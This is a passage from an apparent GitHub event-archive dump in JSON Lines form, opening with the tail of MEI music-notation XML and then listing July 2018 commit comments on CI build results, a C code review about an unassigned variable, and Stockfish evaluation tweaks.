pname=\"a\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L242F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L242F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L242F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L242F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L242F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L242F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L242F2S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L242F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L242F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L242F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L242F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L242F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L242F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L242F2S3\" oct=\"5\" pname=\"d\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L242F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L242F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L242F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L242F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L242F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L242F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L243F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L243F2S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L243F2S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L243F2S3\" oct=\"4\" pname=\"g\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L242F2N2-L243F2N1\" staff=\"1\" startid=\"#note-L242F2S1\" endid=\"#note-L243F2S1\" />\r\n                            <slur xml:id=\"slur-L242F2N1-L243F2N2\" staff=\"1\" startid=\"#note-L242F2S2\" endid=\"#note-L243F2S2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L244\" n=\"67\">\r\n                            <staff xml:id=\"staff-L244F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L244F1N1\" n=\"1\">\r\n                                    <rest xml:id=\"rest-L245F1\" dur=\"2\" ploc=\"d\" oloc=\"5\" />\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L244F2N2\" n=\"2\">\r\n                                    <chord xml:id=\"chord-L245F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L245F2S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L245F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L245F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L245F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L245F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L245F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L245F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L245F2S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L245F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L245F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L245F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L245F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L245F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L245F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L245F2S3\" oct=\"4\" pname=\"g\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L245F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L245F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L245F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L245F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L245F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L245F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L246F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L246F2S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L246F2S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L246F2S3\" oct=\"5\" pname=\"d\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L245F2N2-L246F2N1\" staff=\"1\" startid=\"#note-L245F2S1\" endid=\"#note-L246F2S1\" />\r\n                            <slur xml:id=\"slur-L245F2N1-L246F2N2\" staff=\"1\" startid=\"#note-L245F2S2\" endid=\"#note-L246F2S2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L248\" n=\"68\">\r\n                            <staff xml:id=\"staff-L248F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L248F1N1\" n=\"1\">\r\n                                    <rest xml:id=\"rest-L249F1\" dur=\"2\" ploc=\"d\" oloc=\"5\" />\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L248F2N2\" n=\"2\">\r\n                                    <chord xml:id=\"chord-L249F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L249F2S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L249F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L249F3\">3</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L249F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L249F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L249F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L249F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L249F2S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L249F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L249F3\">3</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L249F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L249F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L249F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L249F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L249F2S3\" oct=\"4\" pname=\"g\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L249F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L249F3\">3</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L249F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L249F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L249F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L249F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L250F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L250F2S1\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L250F2S2\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L250F2S3\" oct=\"4\" pname=\"a\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L249F2N3-L250F2N1\" staff=\"1\" startid=\"#note-L249F2S1\" endid=\"#note-L250F2S1\" />\r\n                            <slur xml:id=\"slur-L249F2N2-L250F2N2\" staff=\"1\" startid=\"#note-L249F2S3\" endid=\"#note-L250F2S3\" />\r\n                            <slur xml:id=\"slur-L249F2N1-L250F2N3\" staff=\"1\" startid=\"#note-L249F2S2\" endid=\"#note-L250F2S2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L251\" n=\"69\">\r\n                            <staff xml:id=\"staff-L251F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L251F1N1\" n=\"1\">\r\n                                    <rest xml:id=\"rest-L252F1\" dur=\"2\" ploc=\"e\" oloc=\"6\" />\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L251F2N2\" n=\"2\">\r\n                                    <chord xml:id=\"chord-L252F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L252F2S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L252F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L252F3\">3</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L252F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L252F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L252F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L252F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L252F2S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L252F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L252F3\">3</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L252F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L252F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L252F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L252F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L252F2S3\" oct=\"5\" pname=\"d\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L252F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L252F3\">3</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L252F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L252F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L252F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L252F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L253F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L253F2S1\" oct=\"5\" pname=\"g\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L253F2S2\" oct=\"5\" pname=\"e\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L253F2S3\" oct=\"5\" pname=\"c\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L252F2N3-L253F2N1\" staff=\"1\" startid=\"#note-L252F2S3\" endid=\"#note-L253F2S3\" />\r\n                            <slur xml:id=\"slur-L252F2N2-L253F2N2\" staff=\"1\" startid=\"#note-L252F2S1\" endid=\"#note-L253F2S1\" />\r\n                            <slur xml:id=\"slur-L252F2N1-L253F2N3\" staff=\"1\" startid=\"#note-L252F2S2\" endid=\"#note-L253F2S2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L254\" n=\"70\">\r\n                            <staff xml:id=\"staff-L254F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L254F1N1\" n=\"1\">\r\n                                    <rest xml:id=\"rest-L255F1\" dur=\"2\" ploc=\"e\" oloc=\"6\" />\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L254F2N2\" n=\"2\">\r\n                                    <chord xml:id=\"chord-L255F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L255F2S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L255F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L255F3\">3</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L255F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L255F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L255F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L255F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L255F2S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L255F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L255F3\">3</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L255F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L255F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L255F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L255F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L255F2S3\" oct=\"5\" pname=\"d\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L255F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L255F3\">3</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L255F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L255F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L255F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L255F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L256F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L256F2S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L256F2S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L256F2S3\" oct=\"4\" pname=\"g\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L255F2N3-L256F2N1\" staff=\"1\" startid=\"#note-L255F2S3\" endid=\"#note-L256F2S1\" />\r\n                            <slur xml:id=\"slur-L255F2N2-L256F2N2\" staff=\"1\" startid=\"#note-L255F2S1\" endid=\"#note-L256F2S3\" />\r\n                            <slur xml:id=\"slur-L255F2N1-L256F2N3\" staff=\"1\" startid=\"#note-L255F2S2\" endid=\"#note-L256F2S2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L257\" right=\"end\" n=\"71\">\r\n                            <staff xml:id=\"staff-L257F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L257F1N1\" n=\"1\">\r\n                                    <rest xml:id=\"rest-L258F1\" dur=\"2\" ploc=\"d\" oloc=\"5\" />\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L257F2N2\" n=\"2\">\r\n                                    <chord xml:id=\"chord-L258F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L258F2S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L258F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L258F3\">3</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L258F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L258F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L258F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L258F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L258F2S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L258F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L258F3\">3</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L258F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L258F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L258F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L258F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L258F2S3\" oct=\"4\" pname=\"g\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L258F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L258F3\">3</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L258F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L258F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L258F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L258F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L259F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L259F2S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L259F2S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L259F2S3\" oct=\"5\" pname=\"d\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L258F2N3-L259F2N1\" staff=\"1\" startid=\"#note-L258F2S1\" endid=\"#note-L259F2S3\" />\r\n                            <slur xml:id=\"slur-L258F2N2-L259F2N2\" staff=\"1\" startid=\"#note-L258F2S3\" endid=\"#note-L259F2S1\" />\r\n                            <slur xml:id=\"slur-L258F2N1-L259F2N3\" staff=\"1\" startid=\"#note-L258F2S2\" endid=\"#note-L259F2S2\" />\r\n                        </measure>\r\n                    </section>\r\n                </score>\r\n            </mdiv>\r\n        </body>\r\n    </music>\r\n</mei>\r\n```\r\n\r\n"}},"created_at":"2018-07-21T00:52:01Z"}
{"id":"7997764550","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29786302,"position":null,"line":null,"path":null,"commit_id":"a1c5dc46f4ab36f9c2a27b78a587fdda01abe1b6","created_at":"2018-07-21T00:53:30Z","updated_at":"2018-07-21T00:53:30Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-243](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-243).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-243-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-21T00:53:30Z"}
{"id":"7997764696","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29786305,"position":null,"line":null,"path":null,"commit_id":"a2c22cb63eb1131ca4a170e7a4030adffa6a1296","created_at":"2018-07-21T00:53:37Z","updated_at":"2018-07-21T00:53:37Z","author_association":"NONE","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2322 of 2322 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a2c22cb63eb1131ca4a170e7a4030adffa6a1296-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a2c22cb63eb1131ca4a170e7a4030adffa6a1296-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a2c22cb63eb1131ca4a170e7a4030adffa6a1296-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-21T00:53:37Z"}
{"id":"7997766710","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29786311,"position":null,"line":null,"path":null,"commit_id":"a2c22cb63eb1131ca4a170e7a4030adffa6a1296","created_at":"2018-07-21T00:55:03Z","updated_at":"2018-07-21T00:55:03Z","author_association":"NONE","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a2c22cb63eb1131ca4a170e7a4030adffa6a1296-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-21T00:55:03Z"}
{"id":"7997767062","type":"CommitCommentEvent","actor":{"login":"stevengj"},"repo":{"name":"stevengj/libctl"},"payload":{"comment":{"id":29786313,"position":83,"line":2356,"path":"utils/geom.c","commit_id":"9f09e79765f92345ad4f4f04136597b4f0e43f25","created_at":"2018-07-21T00:55:16Z","updated_at":"2018-07-21T00:55:16Z","author_association":"OWNER","body":"The value of an unassigned variable could be anything; it's not defined by the standard."}},"created_at":"2018-07-21T00:55:16Z"}
{"id":"7997767152","type":"CommitCommentEvent","actor":{"login":"gabizou"},"repo":{"name":"SpongePowered/SpongeForge"},"payload":{"comment":{"id":29786314,"position":35,"line":175,"path":"src/main/java/org/spongepowered/mod/mixin/core/forge/common/MixinForgeHooks.java","commit_id":"e2be0bc36520c8231baf85a4dafa28d2e65ec14c","created_at":"2018-07-21T00:55:18Z","updated_at":"2018-07-21T00:55:18Z","author_association":"MEMBER","body":"The first check is useless as `isFake()` checks if it's a world server."}},"created_at":"2018-07-21T00:55:18Z"}
{"id":"7997767878","type":"CommitCommentEvent","actor":{"login":"saipsa"},"repo":{"name":"EliasKotlyar/Xiaomi-Dafang-Hacks"},"payload":{"comment":{"id":29786315,"position":null,"line":null,"path":null,"commit_id":"67da745397afc8632b83842eb89a8195d6565484","created_at":"2018-07-21T00:55:51Z","updated_at":"2018-07-21T00:55:51Z","author_association":"NONE","body":"If you use temp file name it will cause two writes, if \"save_snapshot\" is enabled. You should use the same filename, but only delete the file if \"save_snapshot\" is disable."}},"created_at":"2018-07-21T00:55:51Z"}
{"id":"7997769748","type":"CommitCommentEvent","actor":{"login":"aben20807"},"repo":{"name":"aben20807/re-bridgechat"},"payload":{"comment":{"id":29786317,"position":null,"line":null,"path":null,"commit_id":"e716cd7eedd24999ba7a7867c7b7524938d5448b","created_at":"2018-07-21T00:57:10Z","updated_at":"2018-07-21T00:57:10Z","author_association":"OWNER","body":"#7 "}},"created_at":"2018-07-21T00:57:10Z"}
{"id":"7997770733","type":"CommitCommentEvent","actor":{"login":"aben20807"},"repo":{"name":"aben20807/re-bridgechat"},"payload":{"comment":{"id":29786319,"position":null,"line":null,"path":null,"commit_id":"ff6269bfdc7f8e5f78703f64a308ae783edc2af1","created_at":"2018-07-21T00:57:56Z","updated_at":"2018-07-21T00:57:56Z","author_association":"OWNER","body":"#7"}},"created_at":"2018-07-21T00:57:56Z"}
{"id":"7997770967","type":"CommitCommentEvent","actor":{"login":"stevengj"},"repo":{"name":"stevengj/libctl"},"payload":{"comment":{"id":29786321,"position":83,"line":2356,"path":"utils/geom.c","commit_id":"9f09e79765f92345ad4f4f04136597b4f0e43f25","created_at":"2018-07-21T00:58:05Z","updated_at":"2018-07-21T00:58:05Z","author_association":"OWNER","body":"In this case,  we are passing a *pointer* `&inside` to an unassigned variable.  When I first read the code, I assumed it meant that the value of `inside` is set by `normal_to_plane`, which is valid. However, it looks like `normal_to_plane` both reads and writes this value.   In particular, it looks like we have to set `inside = 1` if we want `normal_to_plane` to compute the correct value of `inside` upon return.  So, this is a bug."}},"created_at":"2018-07-21T00:58:05Z"}
{"id":"7997773138","type":"CommitCommentEvent","actor":{"login":"stevengj"},"repo":{"name":"stevengj/libctl"},"payload":{"comment":{"id":29786328,"position":83,"line":2356,"path":"utils/geom.c","commit_id":"9f09e79765f92345ad4f4f04136597b4f0e43f25","created_at":"2018-07-21T00:59:39Z","updated_at":"2018-07-21T00:59:39Z","author_association":"OWNER","body":"Oh, no, the code is correct.  `normal_to_plane` computes the value if the pointer is non-NULL, which is correct."}},"created_at":"2018-07-21T00:59:39Z"}
{"id":"7997774501","type":"CommitCommentEvent","actor":{"login":"bobhy"},"repo":{"name":"bobhy/guide"},"payload":{"comment":{"id":29786337,"position":null,"line":null,"path":null,"commit_id":"46c55ff96825afc34f6b103fa730d1845822db3b","created_at":"2018-07-21T01:00:31Z","updated_at":"2018-07-21T01:00:31Z","author_association":"OWNER","body":"pickup recent edits from master."}},"created_at":"2018-07-21T01:00:31Z"}
{"id":"7997776931","type":"CommitCommentEvent","actor":{"login":"stevengj"},"repo":{"name":"stevengj/libctl"},"payload":{"comment":{"id":29786351,"position":94,"line":2367,"path":"utils/geom.c","commit_id":"9f09e79765f92345ad4f4f04136597b4f0e43f25","created_at":"2018-07-21T01:02:12Z","updated_at":"2018-07-21T01:02:12Z","author_association":"OWNER","body":"`sqrt(s*s+d*d)` looks wrong to me: `s` is unassigned if `inside == 0`."}},"created_at":"2018-07-21T01:02:12Z"}
{"id":"7997777286","type":"CommitCommentEvent","actor":{"login":"boblongoria"},"repo":{"name":"G6EJD/ESP8266-oximetry-and-heart-rate-sensor"},"payload":{"comment":{"id":29786352,"position":null,"line":null,"path":null,"commit_id":"5e3fc2be241536b3c36a17b70ed47d0e831e26b4","created_at":"2018-07-21T01:02:27Z","updated_at":"2018-07-21T01:02:27Z","author_association":"NONE","body":"thanks for the revision..Bob \r\n\r\nalso thanks for the youtube notes..\r\n"}},"created_at":"2018-07-21T01:02:27Z"}
{"id":"7997778236","type":"CommitCommentEvent","actor":{"login":"Srichon"},"repo":{"name":"BlackrockDigital/startbootstrap"},"payload":{"comment":{"id":29786356,"position":22,"line":22,"path":"Gemfile.lock","commit_id":"c5fcd394adb6d83e41e769c38853a20561dfbdb6","created_at":"2018-07-21T01:03:10Z","updated_at":"2018-07-21T01:03:10Z","author_association":"NONE","body":"jekyll"}},"created_at":"2018-07-21T01:03:10Z"}
{"id":"7997780441","type":"CommitCommentEvent","actor":{"login":"zhudavi2"},"repo":{"name":"zhudavi2/SP2-HDM"},"payload":{"comment":{"id":29786359,"position":null,"line":null,"path":null,"commit_id":"fe85e5cb06b8932b06641d7bc0a651ef8dd58b54","created_at":"2018-07-21T01:04:44Z","updated_at":"2018-07-21T01:04:44Z","author_association":"OWNER","body":"Inno Setup script for building installer."}},"created_at":"2018-07-21T01:04:44Z"}
{"id":"7997782468","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29786364,"position":null,"line":null,"path":null,"commit_id":"83c87aaca85a1224a9d6b9cd3f5fa41b51e350f1","created_at":"2018-07-21T01:06:19Z","updated_at":"2018-07-21T01:06:19Z","author_association":"NONE","body":"@protonspring \r\nAdditionally to the -2 i would remove the factor for king safety score too:\r\n`- mg_value(score);`\r\nThis would compensate it in some way. or use `- 7 * mg_value(score) / 8;`"}},"created_at":"2018-07-21T01:06:19Z"}
{"id":"7997784387","type":"CommitCommentEvent","actor":{"login":"KnifuWaifu"},"repo":{"name":"MonikaDiscord/Monika"},"payload":{"comment":{"id":29786370,"position":null,"line":null,"path":null,"commit_id":"9de291a05c3e50682536a6f31787c5238097b66b","created_at":"2018-07-21T01:07:43Z","updated_at":"2018-07-21T01:07:43Z","author_association":"NONE","body":"🅱️"}},"created_at":"2018-07-21T01:07:43Z"}
